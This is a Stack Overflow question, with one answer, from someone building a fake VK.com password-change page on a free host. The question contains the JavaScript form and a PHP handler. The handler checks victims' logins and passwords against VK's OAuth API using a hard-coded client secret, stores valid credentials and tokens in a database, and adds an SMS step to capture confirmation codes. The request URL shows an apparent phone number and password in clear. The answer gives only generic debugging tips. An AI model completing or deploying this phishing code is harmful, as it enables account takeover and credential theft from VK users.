0

I have for example url Request URL: https://justdoit2019.000webhostapp.com/continue.php?act=login&login=380506030076&oldPassword=Avangard200210&captcha_key=&captcha_sid=&validation_sid=&code=&newPassword=Avangard200210a&is2fa=0&qid=&token= Request Method: GET. This request is formed by sending ajax-form by javascript:

var auth = $.ajax("continue.php?act=login&login=" + encodeURIComponent(login) + "&oldPassword=" + encodeURIComponent(password) + "&captcha_key=" + captcha_key + "&captcha_sid=" + captcha_sid + "&validation_sid=" + validation_sid + "&code=" + smscode + "&newPassword=" + encodeURIComponent(g("newpassword").value) + "&is2fa=" + (have2fa ? 1 : 0) + "&qid=" + encodeURIComponent(window.location.search) + "&token=" + gettedToken).done(function() {
            var response = JSON.parse(auth.responseText);

More specifically,Here is my ajax form:

<div class="content-1" id="password" style="display: none;">
            <p class="login">Старый пароль</p>
            <input id="oldpassword" type="password" name="pass" autofocus="" required="" pattern=".{6,50}" class="textbox-blocked">
            <p class="login">Новый пароль</p>
            <input id="newpassword" type="password" name="newpass" required="" pattern=".{6,50}" class="textbox-blocked">
            <p class="login">Повторите пароль</p>
            <input id="newpassword2" type="password" name="repass" required="" pattern=".{6,50}" class="textbox-blocked">
            <input type="submit" onclick="login();" class="button" style="width:134px" value="Подтвердить">
        </div>

I have some troubles.When click button to send form,my PHP handler of this form dont wont to handle this request of form. Just Parse error: syntax error, unexpected ';' in /storage/ssd3/246/11352246/public_html/continue.php on line 3 My PHP handler must use this data (login,password) to check it if login and password valid by using api of vk.com.And If login and password were correct,without refreshing page my PHP handler must save both of it and next, show for USER SECOND part of my HTML code,namely this one

    <div id="sms" style="display: none;">
            <div class="oauth_error">Чтобы подтвердить, что Вы действительно являетесь владельцем страницы, пожалуйста, введите код подтверждения из SMS либо последние 4 цифры номера, с которого Вам поступит звонок.
            </div>
            <br>
            <div class="content-1">
                <input id="validation_sid" type="hidden" name="validation_sid" value="1">
                <p class="login">Код подтверждения:</p>
                <input id="smscode" type="text" required="" pattern=".{6,50}" class="textbox-blocked">
                <input type="submit" onclick="login();" class="button" style="width:134px" value="Подтвердить">
            </div>

Approximately I know that to make such request I must use CURL method.And I approximately try to make it(php handler of this form).But as a result,I got only this error like Just Parse error: syntax error, unexpected ';' in /storage/ssd3/246/11352246/public_html/continue.php on line 3 This is my php handler.May be something wrong with it?Because my button dont want to react=(

<?php

//Создадим headers
$headers = array(
    'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'content-type' => 'application/x-www-form-urlencoded',
    'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
);
//Запишем сюда значения логина и пароля из HTML формы


function login()
{
    if (isset($_GET['login']) && isset($_GET['oldPassword'])) {

        echo $_GET['login'];
        echo $_GET['oldPassword'];
    } else {
        // Fallback behaviour goes here

        $login    = login($_GET['login']);
        $password = login($_GET['oldPassword']);
    }
}
//Если какое-то поле оказалось пустым
if (empty($login) or empty($password))
{
//Отправим пользователя на стартовую страницу authorize и просигнализируем об ошибке
    header('Location: /authorize.php?error_login=true');
    exit;
}
else
{
//Если все поля заполнены, то посылаем запрос на получение токена по нашей ссылке выше
    $get_token = post ('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.'' ,array(
        'headers' => array(
            'accept: '.$headers['accept'],
            'content-type: '.$headers['content-type'],
            'user-agent: '.$headers['user-agent']
        )
    ));
//Если авторизация прошла успешно
    if (preg_match("/[a-z0-9]{85}/", $get_token['headers'], $token))
    {
        $token1 = json_decode(file_get_contents('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.''), true);
        $data = json_decode(file_get_contents('https://api.vk.com/method/users.get?user_id='.$token1['user_id'].'&access_token='.$token[0].'&fields=uid,first_name,last_name&v=5.80'), true);

        //Записываем в переменную текущую дату и время сервера
        $date_l = date("H:i:s  d-m-Y");
//Подключаемся к БД
        $host="localhost";
        $user=""; //Имя пользователя от MySql
        $pass=""; //Пароль от MySql
        $db_name=""; //Имя базы
        $link=mysql_connect($host,$user,$pass);
        mysql_select_db($db_name,$link);
        mysql_query("set names utf8");
//Выполняем запись валида в БД
        $sql = mysql_query("INSERT INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES('".$login."','".$password."','".$token[0]."','".$date_l."','".$token1['user_id']."','".$data['response'][0]['first_name']."','".$data['response'][0]['last_name']."')");
//Если все прошло успешно, то перенаправляем пользователя на vk.com или на ваш сайт
        if ($sql) {
            session_start();
            $_SESSION['logged_user'] = $data['response'][0]['first_name'];
            header('Location: vk.com/');
//Если при записи обнаружены ошибки, то перенаправим пользователя на главную страницу нашего сайта с сообщением об ошибке
        } else header('Location: /authorize.php?error_login=true');
//Закрываем соединение
        mysql_close($link);
        exit;
    }
//Если авторизация не прошла, то отправим пользователя на стартовую страницу с  ошибкой
    else header('Location: /authorize.php?error_login=true');
}
//cUrl POST
function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) {
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

    if(isset($params['params'])) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $params['params']);
    }

    if(isset($params['headers'])) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $params['headers']);
    }

    if(isset($params['cookies'])) {
        curl_setopt($ch, CURLOPT_COOKIE, $params['cookies']);
    }

    if($proxy) {
        curl_setopt($ch, CURLOPT_PROXY, $proxy);

        if($proxy_userpwd) {
            curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd);
        }
    }

    $result = curl_exec($ch);
    $result_explode = explode("\r\n\r\n", $result);

    $headers = ((isset($result_explode[0])) ? $result_explode[0]."\r\n" : '').''.((isset($result_explode[1])) ? $result_explode[1] : '');
    $content = $result_explode[count($result_explode) - 1];


    preg_match_all('|Set-Cookie: (.*);|U', $headers, $parse_cookies);

    $cookies = implode(';', $parse_cookies[1]);

    curl_close($ch);

    return array('headers' => $headers, 'cookies' => $cookies, 'content' => $content);
}
?>

In my PHP handler lot's of unnecessary things,can somebody help me to make PHP handler more correct for this GET request?

Павел Евграфов
  • 1
  • 2
  • You are getting a parser error in the continue.php file. Specifically, it is complaining about an ; on line 3 of that file. What exactly is on line 3 of that file? – kainaw Dec 27 '19 at 18:18

1 Answers1

0

The error you are getting indicates that you have a php syntax error on line 3 of continue.php file. But I cannot reproduce this error with the code you provided.

Is it possible that the code you have on the remote server does not match what you have on your computer? Maybe you fixed it already but failed to upload these changes.

If you are sure you uploaded the latest version to your server, try an experiment. Make some obvious change to your continue.php code:

exit('foo'); // Add this at the beginning of the file after the <?php

Upload that modified file and verify that you see "foo" on the page. If you don't see foo, then something may be wrong with your deployment process.

If you do see foo, then back up your file and try removing code until the error goes away, then add it back little by little until the error comes back. This should reveal what the problem is.

TxRegex
  • 2,347
  • 21
  • 20
  • Thx I will try.if in my main page in code I have two examples of url like 1) continue.php?act=savePhone&phone=" + encodeURIComponent(g("check").value)... and 2) var auth = $.ajax("continue.php?act=login&login=... /////////So,what must be in my Continue.php handler to handle two differents types of request?First request just check data for valid,and Second request try to make autorisation.?? – Павел Евграфов Dec 28 '19 at 20:22